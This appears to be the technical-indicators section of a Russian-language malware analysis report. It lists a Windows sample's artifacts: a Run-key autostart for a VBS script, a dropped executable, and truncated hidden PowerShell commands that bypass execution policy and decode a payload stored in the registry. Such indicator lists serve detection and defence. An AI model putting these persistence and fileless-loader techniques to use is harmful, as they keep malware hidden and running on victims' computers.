Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'FileName' = '%APPDATA%\wa.vbs'
- %APPDATA%\wa.vbs
- %PROGRAMDATA%\mysender.exe
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wa.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '%APPDATA%\wa.vbs' -PropertyType Strin...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '%APPDATA%\wa.vbs' -PropertyType Strin...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('~~`||','1');[byte[]]$_0 = [System.Conve...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('~~`||','1');[byte[]]$_0 = [System.Conve...